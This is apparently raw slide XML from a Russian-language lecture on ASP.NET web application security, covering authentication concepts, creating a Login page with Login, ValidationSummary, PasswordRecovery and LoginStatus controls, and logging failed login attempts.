              <a:t>// Increase the number of invalid logins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>int ErrorCount = (int)ViewState["LoginErrors"] + 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>ViewState["LoginErrors"] = ErrorCount;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>// Now validate the number of errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>if ((ErrorCount &gt; 3) &amp;&amp; (LoginCtrl.PasswordRecoveryUrl != string.Empty))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Response.Redirect(LoginCtrl.PasswordRecoveryUrl);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="200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77875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>Среда безопасности </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>ASP.Net</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="4000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1341438"/>
            <a:ext cx="8229600" cy="5256212"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Любое распределенное приложение обязательно должно поддерживать безопасность его использования, поэтому безопасность является существенной частью и любых </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>приложений.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Вопросы безопасности должны решаться с самого начала разработки </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>приложения. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Безопасность (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>) это все средства связанные с защитой ресурсов (страниц, данных, информации) приложения от несанкционированного доступа. К таким средствам относятся:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>идентификация пользователей;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>предоставление или отказ им в доступе к важным ресурсам, которые </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>хранятся на сервере и </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>передаются по сети.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ASP.Net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>предоставляет разработчику среду (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>) реализации поддержки безопасности, которая решает все эти задачи. В эту среду включены классы:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>для аутентификации и авторизации пользователей, а также средства для работы с данными аутентифицированных пользователей.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" smtClean="0"/>
              <a:t>набор базовых классов для реализации конфиденциальности (секретности) и целостности данных, с помощью использования шифрования и цифровых подписей.</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274638"/>
            <a:ext cx="8229600" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>Создание страницы Login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134147" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1196975"/>
            <a:ext cx="8229600" cy="1511300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> Создайте </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>login page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>с именем </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Login.aspx. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Если используется другое имя файла, то нужно описать новое имя файла в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>web.config. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> На </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>странице добавить </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>ЭУ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>ЭУ запрашивает у пользователя его данные подключения, как показано на рис.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>ЭУ включает такие </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>и пароль</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="134148" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="40427" t="35941" r="21097" b="38504"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1835150" y="3284538"/>
            <a:ext cx="5329238" cy="2636837"/>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ru-RU" sz="4000" smtClean="0"/>
              <a:t>ЭУ подключения пользователя</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="135172" name="Picture 4" descr="The Login Web control in action."/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="2514600"/>
            <a:ext cx="5638800" cy="3930650"/>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539750" y="188913"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1196975"/>
            <a:ext cx="8229600" cy="3240088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Добавьте ЭУ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> ValidationSummary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>на страницу подключения и задайте свойству</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> ValidationSummary.ValidationGroup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>значение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>элемента управления </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Login. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t> Этот ЭУ детально описывает сообщения об ошибках, когда пользователь неправильно укажет пароль</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Можно добавить на страницу подключения ЭУ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>PasswordRecovery. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Если пользователь забыл пароль, то этот ЭУ позволит пользователю его </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>и получить новый, автоматически сформированный пароль по </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>e-mail. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Пользователю также может быть задан секретный вопрос</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="136196" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="17351" t="15427" r="36476" b="64168"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1763713" y="4508500"/>
            <a:ext cx="5976937" cy="1968500"/>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endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137219" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4924425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>   Добавьте ЭУ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>LoginStatus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>на все страницы сайта</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>ЭУ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>LoginStatus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>дает возможность пользователю перейти к странице подключения, если он еще не аутентифицирован</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>При использовании </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>master pages, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>нужно добавить ЭУ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>LoginStatus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>на </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>master page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Это все, что требуется сделать, при использовании </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ASP.NET membership </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>и управлении пользователями с помощью </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Web Site Administration Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>WAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>та как ЭУ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>автоматически выполняет аутентификацию</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Если пользователь ввел правильные регистрационные данные (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>то он регистрируется и такие ЭУ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>membership</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>, как </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>LoginStatus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>автоматически отображают это</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Если пользователь ввел неправильные данные</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> то ЭУ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>сообщит о том, что нужно заново ввести данные</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Нужно создать обработчик для события </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Login.LoginError </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>и выполнить запись в журнал безопасности (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Security event log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Также следует обрабатывать события </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>PasswordRecovery.UserLookupError </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>и</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t> PasswordRecovery.AnswerLookupError. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Иначе администратор может не знать о том, что злоумышленники подбирают пароли и имена пользователей</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="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274638"/>
            <a:ext cx="8229600" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="1" smtClean="0"/>
              <a:t>Создание страницы регистрации новых пользователей</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1341438"/>
            <a:ext cx="8229600" cy="1943100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
